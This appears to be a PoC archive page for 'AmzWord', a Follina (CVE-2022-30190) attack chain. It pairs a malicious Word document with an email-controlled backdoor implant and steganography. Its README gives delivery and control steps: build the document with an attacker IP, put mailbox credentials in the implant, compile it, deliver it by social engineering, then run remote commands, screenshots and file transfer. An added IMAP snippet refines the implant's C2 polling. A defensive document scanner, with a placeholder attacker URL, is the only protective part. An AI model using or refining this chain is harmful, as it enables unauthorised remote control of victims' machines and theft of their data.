POC details: 859036afc71a54fe4933169e7ebf57f39bf7f813

Related vulnerability
Title: Microsoft Windows Support Diagnostic Tool OS command injection vulnerability (CVE-2022-30190)
Description: Microsoft Windows Support Diagnostic Tool is a tool from Microsoft (USA) that collects information to send to Microsoft Support. Microsoft Windows Support Diagnostic Tool (MSDT) has an OS command injection vulnerability. The following products and versions are affected: Windows 10 Version 1809 for 32-bit Systems, Windows 10 Version 1809 for x64-based Systems, Windows
Description
An automated attack chain based on CVE-2022-30190, a backdoor controlled over 163 email, and image steganography.
Introduction
# AmzWord

An automated attack chain based on CVE-2022-30190, a backdoor controlled over 163 email, and image steganography.

Thanks to the following GitHub repositories; we referenced and modified part of their code to integrate and implement our work:

- [gdog](https://github.com/maldevel/gdog)
- [follina](https://github.com/Noxtal/follina)
- [virtual-reality](https://github.com/rokups/virtual-reality)

Chinese README: [see here](https://github.com/Jump-Wang-111/AmzWord/blob/master/README_zh.md)

# Requirements

gdog:

- Python 2.7
- PyCrypto module
- WMI module
- Enum34 module
- Netifaces module

follina:

- Python 3.x

# Usage & attack process

1. Use follina.py to build a malicious Word file and start the HTTP listener

   - You can change the default file name and default IP in the code
   - You can also specify them with `--ip` and `--output`
   - Please refer to [follina](https://github.com/Noxtal/follina) for detailed usage. We have not changed the command-line interface.
   - e.g.: `python follina.py --ip 100.100.100.100 --output maldoc.doc`

2. Modify client.py and gdog.py under gdog and fill in the following information

   ```python
   # The mailbox is the C2 channel: the implant (client.py) sends results to it
   # and the controller (gdog.py) reads tasking from it. The variable names are
   # gdog's; the account can be any SMTP/IMAP mailbox (this project uses 163).
   gmail_user = 'your email'
   gmail_pwd = 'your pwd'
   server = "smtp server"
   imap_server = 'imap server'
   ```

3. Compile client.py into tar.exe (the `client_exe/build` and `client_exe/dist` directories in the snapshot are PyInstaller output) and place it under /follina/www

4. Deliver it to the target by any social engineering method. As soon as the victim opens the Word document, tar.exe is downloaded and executed automatically.

5. The attacker runs gdog locally and sends commands to control the target machine. For usage, see [gdog](https://github.com/maldevel/gdog)
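
The document built in step 1 does nothing but make Word fetch attacker-hosted HTML over HTTP, which then hands an `ms-msdt:` URI to MSDT; the check a defender wants is therefore a scanner for the document itself, not for the HTML. The following is an added example and not code from AmzWord or the follina repository. It assumes that a Follina-style delivery document carries an `oleObject` relationship in `word/_rels/document.xml.rels` with `TargetMode="External"` pointing at an http(s) URL; it also flags the related `attachedTemplate` relationship (remote template injection) and any literal `ms-msdt:` string anywhere in the package. Both documents it scans are constructed in memory, and `attacker.test` is a placeholder host.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
REL_BASE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
# Relationship types that should never point at a remote URL in a document you
# are willing to open: linked OLE objects (the Follina delivery vehicle) and
# attached templates (remote template injection). Hyperlinks are external by
# nature and are deliberately not flagged.
RISKY_REL_TYPES = {"oleObject", "attachedTemplate"}

# Constructed sample parts. A real .docx carries many more (styles, settings,
# fontTable, ...); only the relationship part matters for this check.
CONTENT_TYPES = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
    '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
    '<Default Extension="xml" ContentType="application/xml"/>'
    "</Types>"
)
DOCUMENT_XML = (
    '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
    "<w:body/></w:document>"
)


def rels_part(rel_type, target, mode):
    """Build a word/_rels/document.xml.rels part holding a single relationship."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f'<Relationships xmlns="{RELS_NS}">'
        f'<Relationship Id="rId1" Type="{REL_BASE}{rel_type}" Target="{target}" TargetMode="{mode}"/>'
        "</Relationships>"
    )


def build_docx(rels_xml):
    """Assemble a minimal .docx (an OPC zip) in memory from the parts above."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", CONTENT_TYPES)
        z.writestr("word/document.xml", DOCUMENT_XML)
        z.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


def scan_docx(data):
    """Return findings as (part_name, indicator, target) tuples.

    indicator is the relationship type tail ("oleObject", "attachedTemplate")
    for a risky external relationship, or "ms-msdt-uri" when the literal scheme
    string appears anywhere in the package.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            blob = z.read(name)
            if name.endswith(".rels"):
                root = ET.fromstring(blob)
                for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                    rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                    target = rel.get("Target", "")
                    if (rel.get("TargetMode") == "External"
                            and rel_type in RISKY_REL_TYPES
                            and re.match(r"(?i)https?://", target)):
                        findings.append((name, rel_type, target))
            if b"ms-msdt:" in blob.lower():
                findings.append((name, "ms-msdt-uri", ""))
    return findings


def is_suspicious(data):
    return bool(scan_docx(data))


# Constructed documents: an embedded (internal) OLE object, which is normal, and
# a Follina-style linked object fetched from a placeholder attacker host.
BENIGN_DOCX = build_docx(rels_part("oleObject", "embeddings/oleObject1.bin", "Internal"))
FOLLINA_STYLE_DOCX = build_docx(rels_part("oleObject", "http://attacker.test/payload.html!", "External"))

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_DOCX), ("follina-style", FOLLINA_STYLE_DOCX)):
        print(label, scan_docx(doc))
```

Run it against a real file with `scan_docx(open("maldoc.docx", "rb").read())`. The scanner is intentionally structural: it looks at where Word is told to load content from, so renaming the served HTML or changing the payload does not evade it, while an ordinary document with embedded objects and hyperlinks stays clean.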

# Remark

1. This is only a demo of the attack chain. The running exe can even be seen in Task Manager, which makes the effect easy to observe. We did not do any anti-virus evasion, hiding, or privilege escalation. Of course, none of that is hard on Windows, right?
2. The gdog project has been around for a long time, and we spent a lot of effort getting it to run. The remote-control commands confirmed to work so far are: executing commands, taking screenshots, pop-up windows, shutdown, lock screen, and file transfer. These are sufficient for most needs.
3. We don't know why, but there seems to be a problem with IMAP SUBJECT search: searching for emails with the target subject returns an empty result. We had to take another approach: read all unread emails, filter out the target ones, and mark the rest as unread again. This may cause problems when there are many controlled hosts and still needs to be solved.
4. This project is for learning and exchange purposes only.
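
Remark 3 describes polling the C2 mailbox for tasking: the IMAP SUBJECT search returned nothing, so the implant reads every unread message, filters, and marks the rest unread again. The added example below (not code from AmzWord or gdog) shows the same polling without touching any flags: it searches `UNSEEN`, fetches only the Subject header with `BODY.PEEK[...]`, which per RFC 3501 does not set `\Seen`, and decodes MIME-encoded subjects. It does not diagnose why the SUBJECT search failed. The `gdog:` subject marker, the `FakeIMAP` stand-in and the sample mailbox are assumptions constructed for the demonstration; `open_mailbox` shows the real `imaplib` connection path and is not exercised offline.

```python
import email
import email.header
import imaplib


def open_mailbox(host, user, password, mailbox="INBOX"):
    """Real connection path (not exercised offline): IMAP over TLS, mailbox selected."""
    conn = imaplib.IMAP4_SSL(host)
    conn.login(user, password)
    conn.select(mailbox)
    return conn


def decode_subject(header_block):
    """Decode the Subject: line of a fetched header block (bytes), including
    RFC 2047 encoded-words such as =?utf-8?b?...?=."""
    msg = email.message_from_bytes(header_block)
    parts = email.header.decode_header(msg.get("Subject", ""))
    return "".join(
        p.decode(enc or "utf-8", "replace") if isinstance(p, bytes) else p
        for p, enc in parts
    )


def poll_unseen(conn, marker):
    """Return [(uid, subject)] for unseen messages whose subject contains
    `marker`, leaving every other message's \\Seen flag untouched.

    `conn` is an imaplib.IMAP4-compatible object with a mailbox selected.
    """
    typ, data = conn.uid("SEARCH", None, "UNSEEN")
    if typ != "OK" or not data or not data[0]:
        return []
    hits = []
    for raw_uid in data[0].split():
        uid = raw_uid.decode()
        # BODY.PEEK[...] does not set \Seen (RFC 3501); a plain BODY[...] fetch
        # would, which is what forces the "mark the others unread again" dance.
        typ, parts = conn.uid("FETCH", uid, "(BODY.PEEK[HEADER.FIELDS (SUBJECT)])")
        if typ != "OK":
            continue
        header_block = b"".join(p[1] for p in parts if isinstance(p, tuple))
        subject = decode_subject(header_block)
        if marker in subject:
            hits.append((uid, subject))
    return hits


class FakeIMAP:
    """Constructed stand-in for an imaplib connection (offline demo only).
    It mimics the response shapes imaplib returns and the \\Seen side effect
    of BODY[...] versus BODY.PEEK[...]. messages: uid -> [subject, seen]."""

    def __init__(self, messages):
        self.messages = {u: list(v) for u, v in messages.items()}

    def uid(self, command, *args):
        if command == "SEARCH":
            unseen = [u for u, (_, seen) in self.messages.items() if not seen]
            return "OK", [" ".join(unseen).encode()]
        if command == "FETCH":
            uid, item = args[0], args[1]
            subject = self.messages[uid][0]
            if "BODY.PEEK" not in item:
                self.messages[uid][1] = True  # a plain BODY[...] fetch marks it read
            hdr = f"Subject: {subject}\r\n\r\n".encode()
            meta = f"{uid} (UID {uid} BODY[HEADER.FIELDS (SUBJECT)] {{{len(hdr)}}}".encode()
            return "OK", [(meta, hdr), b")"]
        raise NotImplementedError(command)


# Constructed mailbox: two tasking messages (one MIME-encoded), one unrelated
# unread message, and one tasking message that was already read.
SAMPLE_MAILBOX = {
    "101": ("gdog:cmd whoami", False),
    "102": ("Your weekly newsletter", False),
    "103": ("=?utf-8?b?Z2RvZzpzY3JlZW5zaG90?=", False),  # "gdog:screenshot"
    "104": ("gdog:cmd ipconfig", True),
}


def demo():
    """Poll the constructed mailbox; also report which messages are still unseen."""
    conn = FakeIMAP(SAMPLE_MAILBOX)
    hits = poll_unseen(conn, "gdog:")
    still_unseen = [u for u, (_, seen) in conn.messages.items() if not seen]
    return hits, still_unseen


if __name__ == "__main__":
    print(demo())
```

Because nothing is ever marked read by the poll itself, the implant can decide explicitly when to set `\Seen` (for example only after a task has been executed) with `conn.uid("STORE", uid, "+FLAGS", "(\\Seen)")`, and concurrent controllers no longer race over the same unread set.
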
File snapshot

```
[4.0K] /data/pocs/859036afc71a54fe4933169e7ebf57f39bf7f813
├── [4.0K] follina
│   ├── [4.0K] docx
│   │   ├── [1.3K] [Content_Types].xml
│   │   ├── [4.0K] docProps
│   │   │   ├── [ 703] app.xml
│   │   │   └── [ 734] core.xml
│   │   └── [4.0K] word
│   │       ├── [3.8K] document.xml
│   │       ├── [1.5K] fontTable.xml
│   │       ├── [4.0K] _rels
│   │       │   └── [ 969] document.xml.rels
│   │       ├── [2.9K] settings.xml
│   │       ├── [ 29K] styles.xml
│   │       ├── [4.0K] theme
│   │       │   └── [6.6K] theme1.xml
│   │       └── [ 802] webSettings.xml
│   ├── [3.6K] follina.py
│   ├── [ 10K] maldoc.doc
│   └── [4.0K] www
│       └── [2.3M] CC.png
├── [4.0K] gdog
│   ├── [3.0M] After_CC.png
│   ├── [2.1M] After_Lyf.png
│   ├── [2.3M] CC.png
│   ├── [4.0K] client_exe
│   │   ├── [4.0K] build
│   │   │   └── [4.0K] client3
│   │   │       ├── [ 37K] Analysis-00.toc
│   │   │       ├── [1.3K] client3.exe.manifest
│   │   │       ├── [5.9K] EXE-00.toc
│   │   │       ├── [ 10M] PKG-00.pkg
│   │   │       ├── [4.6K] PKG-00.toc
│   │   │       ├── [1.3M] PYZ-00.pyz
│   │   │       ├── [ 33K] PYZ-00.toc
│   │   │       ├── [3.6K] warn-client3.txt
│   │   │       └── [272K] xref-client3.html
│   │   └── [4.0K] dist
│   │       ├── [3.0M] After_CC.png
│   │       ├── [2.3M] CC.png
│   │       ├── [ 10M] client3.exe
│   │       ├── [2.1M] image.png
│   │       └── [1.3K] Information.txt
│   ├── [ 46K] client.py
│   ├── [ 19K] gdog.py
│   ├── [1.6M] Lyf.png
│   ├── [ 79K] png.py
│   ├── [  29] requirements.txt
│   ├── [ 954] shellcode_generate.py
│   └── [3.7K] stega.py
├── [1.0K] LICENSE
├── [2.7K] README.md
└── [2.2K] README_zh.md

12 directories, 40 files
```